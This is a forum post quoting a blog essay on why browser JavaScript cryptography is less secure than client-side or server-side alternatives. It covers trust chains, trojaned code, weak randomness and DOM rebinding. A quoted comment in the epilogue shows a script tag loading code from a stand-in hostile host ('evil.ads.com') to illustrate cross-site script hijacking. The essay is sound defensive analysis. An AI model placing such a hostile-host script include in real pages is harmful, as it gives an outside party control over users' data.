946
Security / Re: Plain text addresses
« on: June 18, 2013, 03:18 am »
http://rdist.root.org/2010/11/29/final-post-on-javascript-crypto/
Quote
The talk I gave last year on common crypto flaws still seems to generate comments. The majority of the discussion is by defenders of Javascript crypto. I made JS crypto a very minor part of the talk because I thought it would be obvious why it is a bad idea. Apparently, I was wrong to underestimate the grip it seems to have on web developers.
Rather than repeat the same rebuttals over and over, this is my final post on this subject. It ends with a challenge — if you have an application where Javascript crypto is more secure than traditional implementation approaches, post it in the comments. I’ll write a post citing you and explaining how you changed my mind. But since I expect this to be my last post on the matter, read this article carefully before posting.
To illustrate the problems with JS crypto, let’s use a simplified example application: a secure note-taker. The user writes notes to themselves that they can access from multiple computers. The notes will be encrypted by a random key, which is itself encrypted with a key derived from a passphrase. There are three implementation approaches we will consider: traditional client-side app, server-side app, and Javascript crypto. We will ignore attacks that are common to all three implementations (e.g., weak passphrase, client-side keylogger) and focus on their differences.
The traditional client-side approach offers the most security. For example, you could wrap PGP in a GUI with a notes field and store the encrypted files and key on the server. A client who is using the app is secure against future compromise of the server. However, they are still at risk of buggy or trojaned code each time they download the code. If they are concerned about this kind of attack, they can store a local copy and have a cryptographer audit it before using it.
The main advantage to this approach is that PGP has been around almost 20 years. It is well-tested and the GUI author is unlikely to make a mistake in interfacing with it (especially if using GPGME). The code is open-source and available for review.
If you don’t want to install client-side code, a less-secure approach is a server-side app accessed via a web browser. To take advantage of existing crypto code, we’ll use PGP again but the passphrase will be sent to it via HTTP and SSL. The server-side code en/decrypts the notes using GPGME and pipes the results to the user.
Compared to client-side code, there are a number of obvious weaknesses. The passphrase can be grabbed from the memory of the webserver process each time it is entered. The PGP code can be trojaned, possibly in a subtle way. The server’s /dev/urandom can be biased, weakening any keys generated there.
The most important difference from a client-side attack is that it takes effect immediately. An attacker who trojans a client app has to wait until users download and start using it. They can copy the ciphertext from the server, but it isn’t accessible until someone runs their trojan, exposing their passphrase or key. However, a server-side trojan takes effect immediately and all users who access their notes during this time period are compromised.
Another difference is that the password is exposed to a longer chain of software. With a client-side app, the passphrase is entered into the GUI app and passed over local IPC to PGP. It can be wiped from RAM after use, protected from being swapped to disk via mlock(), and generally remains under the user’s control. With the server-side app, it is entered into a web browser (which can cache it), sent over HTTPS (which involves trusting hundreds of CAs and a complex software stack), hits a webserver, and is finally passed over local IPC to PGP. A compromise of any component of that chain exposes the password.
The last difference is that the user cannot audit the server to see if an attack has occurred. With client-side code, the user can take charge of change management, refusing to update to new code until it can be audited. With a transport-level attack (e.g., sslstrip), there is nothing to audit after the fact.
The final implementation approach is Javascript crypto. The trust model is similar to server-side crypto except the code executes in the user’s browser instead of on the server. For our note-taker app, the browser would receive a JS crypto library over HTTPS. The first time it is used, it generates the user’s encryption key and encrypts it with the passphrase (say, derived via PBKDF2). This encrypted key is persisted on the server. The notes files are en/decrypted by the JS code before being sent to the server.
Javascript crypto has all the same disadvantages as server-side crypto, plus more. A slightly modified version of all the server-side attacks still works. Instead of trojaning the server app, an attacker can trojan the JS that is sent to the user. Any changes to the code immediately take effect for all active users. There’s the same long chain of software having access to critical data (JS code and the password processed by it).
So what additional problems make JS crypto worse than the server-side approach?
Numerous libraries not maintained by cryptographers — With a little searching, I found: clipperz, etherhack, Titaniumcore, Dojo, crypto-js, jsSHA, jscryptolib, pidCrypt, van Everdingen’s library, and Movable Type’s AES. All not written or maintained by cryptographers. One exception is Stanford SJCL, although that was written by grad students 6 months ago so it’s too soon to tell how actively tested/maintained it will be.
New code has not been properly reviewed and no clear “best practices” for implementers — oldest library I can find is 2 years old. Major platform-level questions still need to be resolved by even the better ones.
Low-level primitives only — grab bag of AES, Serpent, RC4, and Caesar ciphers (yes, in same library). No high-level operations like GPGME. Now everyone can (and has to) be a crypto protocol designer.
Browser is low-assurance environment — same-origin policy is not a replacement for ACLs, privilege separation, memory protection, mlock(), etc. JS DOM allows arbitrary eval on each element and language allows rebinding most operations (too much flexibility for crypto).
Poor crypto support — JS has no secure PRNG such as /dev/urandom, side channel resistance is much more difficult if not impossible
Too many platforms — IE, Firefox, Netscape, Opera, WebKit, Konqueror, and all versions of each. Crypto code tends to fail catastrophically in the face of platform bugs.
Auditability — each user is served a potentially differing copy of the code. Old code may be running due to browser cache issues. Impossible for server maintainers to audit clients.
JS crypto is not even better for client-side auditability. Since JS is quite lenient in allowing page elements to rebind DOM nodes, even “View Source” does not reveal the actual code running in the browser. You’re only as secure as the worst script run from a given page or any other pages it allows via document.domain.
I have only heard of one application of JS crypto that made sense, but it wasn’t from a security perspective. A web firm processes credit card numbers. For cost reasons, they wanted to avoid PCI audits of their webservers, but PCI required any server that handled plaintext credit card numbers to be audited. So, their webservers send a JS crypto app to the browser client to encrypt the credit card number with an RSA public key. The corresponding private key is accessible only to the backend database. So based on the wording of PCI, only the database server requires an audit.
Of course, this is a ludicrous argument from a security perspective. The webserver is a critical part of the chain of trust in protecting the credit card numbers. There are many subtle ways to trojan RSA encryption code to disclose the plaintext. To detect trojans, the web firm has a client machine that repeatedly downloads and checksums the JS code from each webserver. But an attacker can serve the original JS to that machine while sending trojaned code to other users.
While I agree this is a clever way to avoid PCI audits, it does not increase actual security in any way. It is still subject to the above drawbacks of JS crypto.
If you’ve read this article and still think JS crypto has security advantages over server-side crypto for some particular application, describe it in a comment below. But the burden of proof is on you to explain why the above list of drawbacks is addressed or not relevant to your system. Until then, I am certain JS crypto does not make security sense.
Just because something can be done doesn’t mean it should be.
Epilogue
Auditability of client-side Javascript
I had overstated the auditability of JS in the browser environment by saying the code was accessible via “View Source”. It turns out the browser environment is even more malleable than I first thought. There is no user-accessible menu that tells what code is actually executing on a given page since DOM events can cause rebinding of page elements, including your crypto code. Thanks to Thomas Ptacek for pointing this out. I updated the corresponding paragraph above.
JS libraries such as jQuery, Prototype, and YUI all have APIs for loading additional page elements, which can be HTML or JS. These elements can rebind DOM nodes, meaning each AJAX query can result in the code of a page changing, not just the data displayed. The APIs don’t make a special effort to filter out page elements, and instead trust that you know what you’re doing.
The same origin policy is the only protection against this modification. However, this policy is applied at the page level, not script level. So if any script on a given page sets document.domain to a “safe” value like “example.net”, this would still allow JS code served from “ads.example.net” to override your crypto code on “www.example.net”. Your page is only as secure as the worst script loaded from it.
Brendan Eich made an informative comment on how document.domain is not the worst issue, separation of privileges for cross-site scripts is:
Scripts can be sourced cross-site, so you could get jacked without document.domain entering the picture just by <script src=”evil.ads.com”>. This threat is real but it is independent of document.domain and it doesn’t make document.domain more hazardous. It does not matter where the scripts come from. They need not come from ads.example.net — if http://www.example.net HTML loads them, they’re #include’d into http://www.example.net’s origin (whether it has been modified by document.domain or not).
In other words, if you have communicating pages that set document.domain to join a common superdomain, they have to be as careful with cross-site scripts as a single page loaded from that superdomain would. This suggests that document.domain is not the problem — cross-site scripts having full rights is the problem. See my W2SP 2009 slides.
“Proof of work” systems
Daniel Franke suggested one potentially-useful application for JS crypto: “proof of work” systems. These systems require the client to compute some difficult function to increase the effort required to send spam, cause denial of service, or bruteforce passwords. While I agree this application would not be subject to the security flaws listed in this article, it would have other problems.
Javascript is many times slower than native code and much worse for crypto functions than general computation. This means the advantage an attacker has in creating a native C plus GPU execution environment will likely far outstrip any slowness legitimate users will accept. If the performance ratio between attacker and legitimate users is too great, Javascript can’t be used for this purpose.
He recognized this problem and also suggested two ways to address it: increase the difficulty of the work function only when an attack is going on or only for guesses with weak passphrases. The problem with the first is that an attacker can scale up their guessing rate until the server slows down and then stay just below that threshold. Additionally, she can parallelize guesses for multiple users, depending on what the server uses for rate-limiting. One problem with the second is that it adds a round-trip where the server has to see the length of the attacker’s guess before selecting a difficulty for the proof-of-work function. In general, it’s better to select a one-size-fits-all parameter than to try to dynamically scale.
Browser plugin can checksum JS crypto code
This idea helps my argument, not hurts it. If you can deploy a custom plugin to clients, why not run the crypto there? If it can access the host environment, it has a real PRNG, crypto library (Mozilla NSS or Microsoft CryptoAPI), etc. Because of Javascript’s dynamism, no one knows a secure way to verify signatures on all page elements and DOM updates, so a checksumming plugin would not live up to its promise.